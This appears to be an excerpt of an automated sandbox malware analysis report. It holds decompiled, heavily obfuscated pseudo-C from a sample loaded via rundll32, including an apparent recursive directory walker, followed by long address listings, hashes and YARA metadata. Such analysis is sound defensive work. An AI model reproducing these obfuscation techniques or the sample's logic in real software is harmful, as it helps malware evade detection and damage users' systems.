				_v108 = _v108 ^ 0xd1833bae;
				_v20 = 0x2586e5;
				_v20 = _v20 + 0x8581;
				_v20 = _v20 ^ 0x0026b83c;
				_v92 = 0x3ae4f5;
				_v92 = _v92 << 1;
				_v92 = _v92 << 0xb;
				_v92 = _v92 ^ 0xae4bd9c6;
				_v44 = 0xe6dc30;
				_v44 = _v44 ^ 0xd3982ed3;
				_v44 = _v44 ^ 0xd37e8c85;
				_v144 = 0xe42628;
				_v144 = _v144 | 0xc37700ac;
				_v144 = _v144 >> 0xa;
				_v144 = _v144 << 0xc;
				_v144 = _v144 ^ 0x0fd23fe2;
				_v152 = 0x41402a;
				_t186 =  &_v152; // 0x41402a
				_t384 = 0x19;
				_v152 =  *_t186 / _t383;
				_v152 = _v152 * 0x6a;
				_v152 = _v152 ^ 0x2485591b;
				_v152 = _v152 ^ 0x24bff8d4;
				_v160 = 0xbf0758;
				_v160 = _v160 + 0x522b;
				_v160 = _v160 >> 0xe;
				_v160 = _v160 + 0xffff65d4;
				_v160 = _v160 ^ 0xfff1feea;
				_v84 = 0x1a9ecc;
				_v84 = _v84 << 0x10;
				_t385 = 0x2d;
				_v84 = _v84 / _t384;
				_v84 = _v84 ^ 0x065118ef;
				_v120 = 0x6a6625;
				_t219 =  &_v120; // 0x6a6625
				_v120 =  *_t219 / _t385;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 + 0x1650;
				_v120 = _v120 ^ 0x00013394;
				_v76 = 0x6cd503;
				_v76 = _v76 + 0xffff64c6;
				_v76 = _v76 * 0x17;
				_v76 = _v76 ^ 0x09bb62c3;
				_v128 = 0x4363ee;
				_v128 = _v128 | 0x70162fad;
				_v128 = _v128 * 0x15;
				_v128 = _v128 + 0xffff87d6;
				_v128 = _v128 ^ 0x372e6b7a;
				_v36 = 0xd9ddf9;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x1b34c995;
				_v136 = 0xc7126f;
				_v136 = _v136 << 3;
				_v136 = _v136 >> 6;
				_v136 = _v136 + 0x2e5f;
				_v136 = _v136 ^ 0x001d82e9;
				_v104 = 0x7714f2;
				_v104 = _v104 << 2;
				_v104 = _v104 * 5;
				_t358 = 0x5786d8d;
				_v104 = _v104 | 0x0a59959c;
				_v104 = _v104 ^ 0x0b5ace50;
				_v68 = 0x585054;
				_v68 = _v68 ^ 0x33c1c88e;
				_v68 = _v68 ^ 0x9bceaa07;
				_v68 = _v68 ^ 0xa855990f;
				_v56 = 0xa2136b;
				_v56 = _v56 + 0x4ebb;
				_v56 = _v56 ^ 0x00a98962;
				_v32 = 0x51a57b;
				_v32 = _v32 >> 0xe;
				_v32 = _v32 ^ 0x0002096e;
				_v48 = 0x9fd766;
				_v48 = _v48 | 0x00a10b6a;
				_v48 = _v48 ^ 0x00bfd9fa;
				do {
					while(_t375 != _t358) {
						if(_t375 == 0x79707ab) {
							_t375 = 0x7c4530c;
							continue;
						} else {
							if(_t375 == 0x7c4530c) {
								_push(_v156);
								_push(_v96);
								_push(0x2b1678);
								_t366 = E002BAB66(_v88, _v80, __eflags);
								_push(_v28);
								_push(_v116);
								_t302 =  &_v148; // 0x372e6b7a
								_push(0x2b1538);
								__eflags = E002C0EDA(E002BAB66(_v72,  *_t302, __eflags), _v64, _v124, _t366,  &_v16, _v52, _v24) - _v140;
								_t375 =  ==  ? 0x5786d8d : 0xbb932f6;
								E002BAE03(_v132, _v100, _v108, _t366);
								E002BAE03(_v20, _v92, _v44, _t367);
								_t426 = _v12;
								_t431 =  &(_t431[0xf]);
								L10:
								_t358 = 0x5786d8d;
								goto L11;
							} else {
								if(_t375 != 0xfc0b370) {
									goto L11;
								} else {
									E002B7027(_v32, _v40, _v16, _v48);
								}
							}
						}
						L6:
						return _t430;
					}
					_push(_v84);
					_push(_v160);
					_push(0x2b1588);
					_t359 = E002BAB66(_v144, _v152, __eflags);
					_t360 =  *0x2d5c9c; // 0x0
					__eflags = E002CF9E2(_v112, _v120, _v16,  *_t426, _v76, _v144, _v128,  *((intOrPtr*)(_t426 + 4)), _v36, _v136, _t359, _t360 + 8) - _v60;
					_t375 = 0xfc0b370;
					_t430 =  ==  ? 1 : _t430;
					E002BAE03(_v104, _v68, _v56, _t359);
					_t431 =  &(_t431[0xf]);
					goto L10;
					L11:
					__eflags = _t375 - 0xbb932f6;
				} while (__eflags != 0);
				goto L6;
			}



























































                                                                                                                      0x002cacd3
                                                                                                                      0x002cacdd
                                                                                                                      0x002cacdf
                                                                                                                      0x002cace6
                                                                                                                      0x002cacf3
                                                                                                                      0x002cacf5
                                                                                                                      0x002cacfa
                                                                                                                      0x002cad01
                                                                                                                      0x002cad09
                                                                                                                      0x002cad0e
                                                                                                                      0x002cad16
                                                                                                                      0x002cad25
                                                                                                                      0x002cad29
                                                                                                                      0x002cad2e
                                                                                                                      0x002cad33
                                                                                                                      0x002cad3b
                                                                                                                      0x002cad43
                                                                                                                      0x002cad4b
                                                                                                                      0x002cad50
                                                                                                                      0x002cad58
                                                                                                                      0x002cad64
                                                                                                                      0x002cad69
                                                                                                                      0x002cad6f
                                                                                                                      0x002cad77
                                                                                                                      0x002cad89
                                                                                                                      0x002cad8e
                                                                                                                      0x002cad97
                                                                                                                      0x002cada2
                                                                                                                      0x002cadaa
                                                                                                                      0x002cadaf
                                                                                                                      0x002cadb7
                                                                                                                      0x002cadbf
                                                                                                                      0x002cadc7
                                                                                                                      0x002cadd0
                                                                                                                      0x002cadd5
                                                                                                                      0x002caddb
                                                                                                                      0x002cade3
                                                                                                                      0x002cadeb
                                                                                                                      0x002cadf5
                                                                                                                      0x002cadf6
                                                                                                                      0x002cadfa
                                                                                                                      0x002cae02
                                                                                                                      0x002cae10
                                                                                                                      0x002cae14
                                                                                                                      0x002cae21
                                                                                                                      0x002cae25
                                                                                                                      0x002cae2d
                                                                                                                      0x002cae35
                                                                                                                      0x002cae3a
                                                                                                                      0x002cae42
                                                                                                                      0x002cae4a
                                                                                                                      0x002cae52
                                                                                                                      0x002cae57
                                                                                                                      0x002cae5f
                                                                                                                      0x002cae64
                                                                                                                      0x002cae6c
                                                                                                                      0x002cae74
                                                                                                                      0x002cae84
                                                                                                                      0x002cae89
                                                                                                                      0x002cae8f
                                                                                                                      0x002cae97
                                                                                                                      0x002cae9f
                                                                                                                      0x002caeaa
                                                                                                                      0x002caeb2
                                                                                                                      0x002caebd
                                                                                                                      0x002caec5
                                                                                                                      0x002caecd
                                                                                                                      0x002caed5
                                                                                                                      0x002caeda
                                                                                                                      0x002caee2
                                                                                                                      0x002caeed
                                                                                                                      0x002caef8
                                                                                                                      0x002caf03
                                                                                                                      0x002caf16
                                                                                                                      0x002caf19
                                                                                                                      0x002caf20
                                                                                                                      0x002caf2b
                                                                                                                      0x002caf38
                                                                                                                      0x002caf3c
                                                                                                                      0x002caf41
                                                                                                                      0x002caf46
                                                                                                                      0x002caf4e
                                                                                                                      0x002caf56
                                                                                                                      0x002caf5e
                                                                                                                      0x002caf63
                                                                                                                      0x002caf6b
                                                                                                                      0x002caf73
                                                                                                                      0x002caf78
                                                                                                                      0x002caf80
                                                                                                                      0x002caf88
                                                                                                                      0x002caf90
                                                                                                                      0x002caf9b
                                                                                                                      0x002cafa6
                                                                                                                      0x002cafb1
                                                                                                                      0x002cafb9
                                                                                                                      0x002cafbd
                                                                                                                      0x002cafc2
                                                                                                                      0x002cafca
                                                                                                                      0x002cafd5
                                                                                                                      0x002cafe0
                                                                                                                      0x002cafeb
                                                                                                                      0x002caff3
                                                                                                                      0x002caffb
                                                                                                                      0x002cb000
                                                                                                                      0x002cb005
                                                                                                                      0x002cb00d
                                                                                                                      0x002cb015
                                                                                                                      0x002cb01b
                                                                                                                      0x002cb01c
                                                                                                                      0x002cb029
                                                                                                                      0x002cb02d
                                                                                                                      0x002cb035
                                                                                                                      0x002cb03d
                                                                                                                      0x002cb045
                                                                                                                      0x002cb04d
                                                                                                                      0x002cb052
                                                                                                                      0x002cb05a
                                                                                                                      0x002cb062
                                                                                                                      0x002cb06a
                                                                                                                      0x002cb075
                                                                                                                      0x002cb076
                                                                                                                      0x002cb07a
                                                                                                                      0x002cb084
                                                                                                                      0x002cb08c
                                                                                                                      0x002cb092
                                                                                                                      0x002cb096
                                                                                                                      0x002cb09b
                                                                                                                      0x002cb0a3
                                                                                                                      0x002cb0ab
                                                                                                                      0x002cb0b3
                                                                                                                      0x002cb0c0
                                                                                                                      0x002cb0c4
                                                                                                                      0x002cb0cc
                                                                                                                      0x002cb0d4
                                                                                                                      0x002cb0e1
                                                                                                                      0x002cb0e5
                                                                                                                      0x002cb0ed
                                                                                                                      0x002cb0f5
                                                                                                                      0x002cb100
                                                                                                                      0x002cb108
                                                                                                                      0x002cb113
                                                                                                                      0x002cb11b
                                                                                                                      0x002cb120
                                                                                                                      0x002cb125
                                                                                                                      0x002cb12d
                                                                                                                      0x002cb135
                                                                                                                      0x002cb13d
                                                                                                                      0x002cb147
                                                                                                                      0x002cb14b
                                                                                                                      0x002cb150
                                                                                                                      0x002cb158
                                                                                                                      0x002cb160
                                                                                                                      0x002cb168
                                                                                                                      0x002cb170
                                                                                                                      0x002cb178
                                                                                                                      0x002cb180
                                                                                                                      0x002cb188
                                                                                                                      0x002cb190
                                                                                                                      0x002cb198
                                                                                                                      0x002cb1a3
                                                                                                                      0x002cb1ab
                                                                                                                      0x002cb1b6
                                                                                                                      0x002cb1c1
                                                                                                                      0x002cb1cc
                                                                                                                      0x002cb1d7
                                                                                                                      0x002cb1d7
                                                                                                                      0x002cb1e5
                                                                                                                      0x002cb2e7
                                                                                                                      0x00000000
                                                                                                                      0x002cb1eb
                                                                                                                      0x002cb1f1
                                                                                                                      0x002cb22f
                                                                                                                      0x002cb233
                                                                                                                      0x002cb23f
                                                                                                                      0x002cb244
                                                                                                                      0x002cb249
                                                                                                                      0x002cb252
                                                                                                                      0x002cb256
                                                                                                                      0x002cb25e
                                                                                                                      0x002cb29e
                                                                                                                      0x002cb2b5
                                                                                                                      0x002cb2b8
                                                                                                                      0x002cb2d3
                                                                                                                      0x002cb2d8
                                                                                                                      0x002cb2df
                                                                                                                      0x002cb37b
                                                                                                                      0x002cb37b
                                                                                                                      0x00000000
                                                                                                                      0x002cb1f3
                                                                                                                      0x002cb1f9
                                                                                                                      0x00000000
                                                                                                                      0x002cb1ff
                                                                                                                      0x002cb21b
                                                                                                                      0x002cb221
                                                                                                                      0x002cb1f9
                                                                                                                      0x002cb1f1
                                                                                                                      0x002cb224
                                                                                                                      0x002cb22e
                                                                                                                      0x002cb22e
                                                                                                                      0x002cb2f1
                                                                                                                      0x002cb2f5
                                                                                                                      0x002cb301
                                                                                                                      0x002cb306
                                                                                                                      0x002cb310
                                                                                                                      0x002cb356
                                                                                                                      0x002cb358
                                                                                                                      0x002cb365
                                                                                                                      0x002cb373
                                                                                                                      0x002cb378
                                                                                                                      0x00000000
                                                                                                                      0x002cb380
                                                                                                                      0x002cb380
                                                                                                                      0x002cb380
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %fj$(&$*@A$+R$TPX$_.$cw~6$r*N$zk.7
                                                                                                                      • API String ID: 0-4179132742
                                                                                                                      • Opcode ID: ffafc34598540c4f70bfa45f706d907a64265a59bb15ae6c8a768238174614f0
                                                                                                                      • Instruction ID: dda2a54233ba0ba7cdb01bd9ac1e3cfb68685142ac75fa4fec16d51d79c528d2
                                                                                                                      • Opcode Fuzzy Hash: ffafc34598540c4f70bfa45f706d907a64265a59bb15ae6c8a768238174614f0
                                                                                                                      • Instruction Fuzzy Hash: A0F11D715083809FD3A8CF25D48AA4BFBE2FBC0788F50891DF59A86260D7B19959CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Version$ClipboardFormatRegister
                                                                                                                      • String ID: MSWHEEL_ROLLMSG
                                                                                                                      • API String ID: 2888461884-2485103130
                                                                                                                      • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                      • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                      • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B1950 Relevance: 10.3, Strings: 8, Instructions: 345COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E002B1950(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				char _v176;
				short _v720;
				short _v722;
				char _v724;
				signed int _v768;
				char _v1288;
				char _v1808;
				void* _t335;
				signed int _t360;
				signed int _t362;
				intOrPtr _t371;
				void* _t373;
				signed int _t379;
				void* _t406;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				void* _t426;
				void* _t427;

				_t371 = _a8;
				_push(_a20);
				if(__eflags == 0) {
					_push(_a16);
					_push(_a12);
					_push(_t371);
					_push(_a4);
					_push(__edx);
					_push(__ecx);
					E002BCF25(_t335);
					_v16 = 0x6f572e;
				}
				_t427 = _t426 + 0x1c;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xd52f;
				_t373 = 0x80f983c;
				_v16 = _v16 ^ 0x3310f03a;
				_v16 = _v16 ^ 0x33101333;
				_v60 = 0xed71dd;
				_v60 = _v60 ^ 0x2497a453;
				_t418 = 0x26;
				_v60 = _v60 * 0x72;
				_v60 = _v60 ^ 0x3eb60fda;
				_v112 = 0xa5b0b2;
				_v112 = _v112 + 0x8954;
				_v112 = _v112 ^ 0x00ada628;
				_v108 = 0xe5587e;
				_v108 = _v108 << 9;
				_v108 = _v108 ^ 0xcab3bbf0;
				_v92 = 0x4845fb;
				_v92 = _v92 + 0x365f;
				_v92 = _v92 + 0xdd1a;
				_v92 = _v92 ^ 0x004e95c0;
				_v88 = 0xa51f24;
				_v88 = _v88 ^ 0x4dc3992d;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x002183c7;
				_v28 = 0x92b1f2;
				_v28 = _v28 + 0xdb28;
				_v28 = _v28 ^ 0xc5c4fb2d;
				_v28 = _v28 + 0xffff07a3;
				_v28 = _v28 ^ 0xc5543e55;
				_v56 = 0x45fcf7;
				_v56 = _v56 ^ 0x18f8a820;
				_v56 = _v56 / _t418;
				_v56 = _v56 ^ 0x00a79737;
				_v72 = 0xd5567a;
				_v72 = _v72 ^ 0x96c46f64;
				_v72 = _v72 + 0x1123;
				_v72 = _v72 ^ 0x96131221;
				_v128 = 0xd7fcd2;
				_v128 = _v128 | 0x19fc7ba7;
				_v128 = _v128 ^ 0x19f2013f;
				_v36 = 0xb63dda;
				_v36 = _v36 | 0x57c3443c;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x000375d9;
				_v120 = 0x9784e5;
				_v120 = _v120 ^ 0x5442b457;
				_v120 = _v120 ^ 0x54d2e3fe;
				_v152 = 0x86b47c;
				_v152 = _v152 | 0x1a648f0d;
				_v152 = _v152 ^ 0x1ae2f95e;
				_v104 = 0xe16033;
				_v104 = _v104 + 0xffff0503;
				_v104 = _v104 ^ 0x00e7872e;
				_v140 = 0x7ced29;
				_v140 = _v140 + 0x937a;
				_v140 = _v140 ^ 0x00718bd8;
				_v148 = 0xa848b7;
				_v148 = _v148 ^ 0xa8d47762;
				_v148 = _v148 ^ 0xa87b6210;
				_v124 = 0xc4055c;
				_v124 = _v124 << 5;
				_v124 = _v124 ^ 0x1882bddf;
				_v80 = 0x58e97;
				_t419 = 0x7c;
				_v80 = _v80 / _t419;
				_v80 = _v80 + 0xffff9366;
				_v80 = _v80 ^ 0xfffe01cd;
				_v48 = 0x77db93;
				_t420 = 0x3a;
				_v48 = _v48 / _t420;
				_v48 = _v48 + 0xffffa5b4;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x00036e08;
				_v132 = 0x4854bc;
				_t421 = 0x4c;
				_v132 = _v132 * 0x24;
				_v132 = _v132 ^ 0x0a23127f;
				_v84 = 0x297997;
				_v84 = _v84 / _t421;
				_t422 = 0x45;
				_v84 = _v84 * 0x5e;
				_v84 = _v84 ^ 0x003e8360;
				_v24 = 0xba7a12;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x8e2fa782;
				_v24 = _v24 + 0xffffcaa3;
				_v24 = _v24 ^ 0xfad920cc;
				_v64 = 0xf87d94;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 4;
				_v64 = _v64 ^ 0x0002c2de;
				_v68 = 0x627eea;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 | 0x4b478a8f;
				_v68 = _v68 ^ 0x4b4b50ae;
				_v32 = 0x4d9af3;
				_v32 = _v32 + 0xffff3fdf;
				_v32 = _v32 | 0x07023235;
				_v32 = _v32 ^ 0xa9cb8ace;
				_v32 = _v32 ^ 0xae825d6e;
				_v144 = 0x2c231c;
				_v144 = _v144 ^ 0x372f588c;
				_v144 = _v144 ^ 0x37050cc1;
				_v40 = 0xed36d5;
				_v40 = _v40 / _t422;
				_v40 = _v40 + 0xffff2e56;
				_v40 = _v40 * 0xd;
				_v40 = _v40 ^ 0x002f5a10;
				_v20 = 0xb226b9;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x7ec33512;
				_v20 = _v20 ^ 0x86eef9df;
				_v20 = _v20 ^ 0xee6f0a5e;
				_v76 = 0xa2d2;
				_v76 = _v76 + 0xffff2403;
				_v76 = _v76 + 0xffff5c56;
				_v76 = _v76 ^ 0xfff84be5;
				_v12 = 0x61529e;
				_v12 = _v12 + 0x826f;
				_v12 = _v12 | 0x315ab852;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x0008d08d;
				_v136 = 0xbe89c0;
				_v136 = _v136 ^ 0x9f3b785a;
				_v136 = _v136 ^ 0x9f8a2ffd;
				_v116 = 0x9615af;
				_v116 = _v116 | 0x7dcb4113;
				_v116 = _v116 ^ 0x7dd5a359;
				_v100 = 0x787e8d;
				_t423 = 0xf;
				_v100 = _v100 * 0x78;
				_v100 = _v100 ^ 0x3874d75c;
				_v96 = 0xce992e;
				_v96 = _v96 << 9;
				_v96 = _v96 | 0x5045bce0;
				_v96 = _v96 ^ 0xdd755c45;
				_v52 = 0xe3c541;
				_t417 = _v100;
				_v52 = _v52 / _t423;
				_v52 = _v52 + 0xffff4fb9;
				_v52 = _v52 | 0x0dbfd8b3;
				_v52 = _v52 ^ 0x0db5e533;
				_v44 = 0xd3f0eb;
				_v44 = _v44 | 0x02fbd4da;
				_v44 = _v44 >> 6;
				_v44 = _v44 + 0xffffa89e;
				_v44 = _v44 ^ 0x000772a1;
				while(1) {
					L5:
					_t406 = 0x2e;
					L6:
					while(_t373 != 0xcf103a) {
						if(_t373 == 0x80f983c) {
							_v156 = _t371;
							_t373 = 0xcf103a;
							continue;
						}
						if(_t373 == 0x8bdeaee) {
							__eflags = _v768 & _v16;
							if(__eflags == 0) {
								_t360 = _a16( &_v768,  &_v176);
								asm("sbb ecx, ecx");
								_t379 =  ~_t360 & 0x01058edd;
								L13:
								_t373 = _t379 + 0xe9f3001;
								while(1) {
									L5:
									_t406 = 0x2e;
									goto L6;
								}
							} else {
								__eflags = _v724 - _t406;
								if(_v724 != _t406) {
									L22:
									__eflags = _a4;
									if(__eflags != 0) {
										_push(_v48);
										_push(_v80);
										_push(0x2b1264);
										E002BE7CE(E002BAB66(_v148, _v124, __eflags), __eflags, _v132, _t371, _v148, _v84, _v24, _v64, _v68,  &_v724);
										_t310 =  &_a12; // 0xee6f0a5e
										E002B1950(_v32, _v144, __eflags, _a4,  &_v1808,  *_t310, _a16, _v40);
										_t427 = _t427 + 0x40;
										_t362 = E002BAE03(_v20, _v76, _v12, _t365);
										_t406 = 0x2e;
									}
								} else {
									__eflags = _v722;
									if(__eflags != 0) {
										__eflags = _v722 - _t406;
										if(_v722 != _t406) {
											goto L22;
										} else {
											__eflags = _v720;
											if(__eflags != 0) {
												goto L22;
											}
										}
									}
								}
								_t373 = 0xfa4bede;
								continue;
							}
							L31:
						}
						if(_t373 != 0x8fff290) {
							if(_t373 == 0xe9f3001) {
								return E002C8C35(_v100, _t417, _v96, _v52, _v44);
							}
							if(_t373 != 0xfa4bede) {
								L27:
								__eflags = _t373 - 0x71f77cc;
								if(__eflags != 0) {
									continue;
								} else {
									return _t362;
								}
								goto L31;
							} else {
								_t277 =  &_v768; // 0x15f5595f
								_t362 = E002CF7FC(_v136, _t417, _v116, _t277);
								asm("sbb ecx, ecx");
								_t379 =  ~_t362 & 0xfa1ebaed;
								goto L13;
							}
						}
						_t362 = E002CBAEA( &_v1288, _v152,  &_v768, _v104, _v140);
						_t417 = _t362;
						_t427 = _t427 + 0xc;
						__eflags = _t362 - 0xffffffff;
						if(__eflags != 0) {
							_t373 = 0x8bdeaee;
							goto L5;
						}
						return _t362;
						goto L31;
					}
					_push(_v92);
					_push(_v108);
					_push(0x2b12d4);
					E002B3BF8(_v28, __eflags, E002BAB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t371);
					E002BAE03(_v128, _v36, _v120, _t353);
					_t427 = _t427 + 0x28;
					_t373 = 0x8fff290;
					_t406 = 0x2e;
					goto L27;
				}
			}






























































                                                                                                                      0x002b195a
                                                                                                                      0x002b195f
                                                                                                                      0x002b1960
                                                                                                                      0x002b1962
                                                                                                                      0x002b1965
                                                                                                                      0x002b1968
                                                                                                                      0x002b1969
                                                                                                                      0x002b196c
                                                                                                                      0x002b196d
                                                                                                                      0x002b196e
                                                                                                                      0x002b1973
                                                                                                                      0x002b1973
                                                                                                                      0x002b197a
                                                                                                                      0x002b197d
                                                                                                                      0x002b1983
                                                                                                                      0x002b198a
                                                                                                                      0x002b198f
                                                                                                                      0x002b1996
                                                                                                                      0x002b199d
                                                                                                                      0x002b19a4
                                                                                                                      0x002b19b1
                                                                                                                      0x002b19b2
                                                                                                                      0x002b19b5
                                                                                                                      0x002b19bc
                                                                                                                      0x002b19c3
                                                                                                                      0x002b19ca
                                                                                                                      0x002b19d1
                                                                                                                      0x002b19d8
                                                                                                                      0x002b19dc
                                                                                                                      0x002b19e3
                                                                                                                      0x002b19ea
                                                                                                                      0x002b19f1
                                                                                                                      0x002b19f8
                                                                                                                      0x002b19ff
                                                                                                                      0x002b1a06
                                                                                                                      0x002b1a0d
                                                                                                                      0x002b1a11
                                                                                                                      0x002b1a18
                                                                                                                      0x002b1a1f
                                                                                                                      0x002b1a26
                                                                                                                      0x002b1a2d
                                                                                                                      0x002b1a34
                                                                                                                      0x002b1a3b
                                                                                                                      0x002b1a42
                                                                                                                      0x002b1a4e
                                                                                                                      0x002b1a51
                                                                                                                      0x002b1a58
                                                                                                                      0x002b1a5f
                                                                                                                      0x002b1a66
                                                                                                                      0x002b1a6d
                                                                                                                      0x002b1a74
                                                                                                                      0x002b1a7b
                                                                                                                      0x002b1a82
                                                                                                                      0x002b1a89
                                                                                                                      0x002b1a90
                                                                                                                      0x002b1a97
                                                                                                                      0x002b1a9b
                                                                                                                      0x002b1a9f
                                                                                                                      0x002b1aa6
                                                                                                                      0x002b1aad
                                                                                                                      0x002b1ab4
                                                                                                                      0x002b1abb
                                                                                                                      0x002b1ac5
                                                                                                                      0x002b1acf
                                                                                                                      0x002b1ad9
                                                                                                                      0x002b1ae0
                                                                                                                      0x002b1ae7
                                                                                                                      0x002b1aee
                                                                                                                      0x002b1af8
                                                                                                                      0x002b1b02
                                                                                                                      0x002b1b0c
                                                                                                                      0x002b1b16
                                                                                                                      0x002b1b20
                                                                                                                      0x002b1b2a
                                                                                                                      0x002b1b31
                                                                                                                      0x002b1b35
                                                                                                                      0x002b1b3e
                                                                                                                      0x002b1b4a
                                                                                                                      0x002b1b4f
                                                                                                                      0x002b1b54
                                                                                                                      0x002b1b5b
                                                                                                                      0x002b1b62
                                                                                                                      0x002b1b6c
                                                                                                                      0x002b1b71
                                                                                                                      0x002b1b76
                                                                                                                      0x002b1b7d
                                                                                                                      0x002b1b81
                                                                                                                      0x002b1b88
                                                                                                                      0x002b1b93
                                                                                                                      0x002b1b96
                                                                                                                      0x002b1b99
                                                                                                                      0x002b1ba0
                                                                                                                      0x002b1bae
                                                                                                                      0x002b1bb5
                                                                                                                      0x002b1bb6
                                                                                                                      0x002b1bb9
                                                                                                                      0x002b1bc0
                                                                                                                      0x002b1bc7
                                                                                                                      0x002b1bcb
                                                                                                                      0x002b1bd2
                                                                                                                      0x002b1bd9
                                                                                                                      0x002b1be0
                                                                                                                      0x002b1be7
                                                                                                                      0x002b1beb
                                                                                                                      0x002b1bef
                                                                                                                      0x002b1bf6
                                                                                                                      0x002b1bfd
                                                                                                                      0x002b1c01
                                                                                                                      0x002b1c08
                                                                                                                      0x002b1c0f
                                                                                                                      0x002b1c16
                                                                                                                      0x002b1c1d
                                                                                                                      0x002b1c24
                                                                                                                      0x002b1c2b
                                                                                                                      0x002b1c32
                                                                                                                      0x002b1c3c
                                                                                                                      0x002b1c46
                                                                                                                      0x002b1c50
                                                                                                                      0x002b1c5c
                                                                                                                      0x002b1c5f
                                                                                                                      0x002b1c6a
                                                                                                                      0x002b1c6d
                                                                                                                      0x002b1c74
                                                                                                                      0x002b1c7b
                                                                                                                      0x002b1c7f
                                                                                                                      0x002b1c86
                                                                                                                      0x002b1c8d
                                                                                                                      0x002b1c94
                                                                                                                      0x002b1c9b
                                                                                                                      0x002b1ca2
                                                                                                                      0x002b1ca9
                                                                                                                      0x002b1cb0
                                                                                                                      0x002b1cb7
                                                                                                                      0x002b1cbe
                                                                                                                      0x002b1cc5
                                                                                                                      0x002b1cc9
                                                                                                                      0x002b1cd0
                                                                                                                      0x002b1cda
                                                                                                                      0x002b1ce6
                                                                                                                      0x002b1cf0
                                                                                                                      0x002b1cf7
                                                                                                                      0x002b1cfe
                                                                                                                      0x002b1d05
                                                                                                                      0x002b1d12
                                                                                                                      0x002b1d13
                                                                                                                      0x002b1d16
                                                                                                                      0x002b1d1d
                                                                                                                      0x002b1d24
                                                                                                                      0x002b1d28
                                                                                                                      0x002b1d2f
                                                                                                                      0x002b1d36
                                                                                                                      0x002b1d42
                                                                                                                      0x002b1d45
                                                                                                                      0x002b1d48
                                                                                                                      0x002b1d4f
                                                                                                                      0x002b1d56
                                                                                                                      0x002b1d5d
                                                                                                                      0x002b1d64
                                                                                                                      0x002b1d6b
                                                                                                                      0x002b1d6f
                                                                                                                      0x002b1d76
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7f
                                                                                                                      0x00000000
                                                                                                                      0x002b1d80
                                                                                                                      0x002b1d92
                                                                                                                      0x002b1f11
                                                                                                                      0x002b1f17
                                                                                                                      0x00000000
                                                                                                                      0x002b1f17
                                                                                                                      0x002b1d9e
                                                                                                                      0x002b1e2d
                                                                                                                      0x002b1e33
                                                                                                                      0x002b1efd
                                                                                                                      0x002b1f04
